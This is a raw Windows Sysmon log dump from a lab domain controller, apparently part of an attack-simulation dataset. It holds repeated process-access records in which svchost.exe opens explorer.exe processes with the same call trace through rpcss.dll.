16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 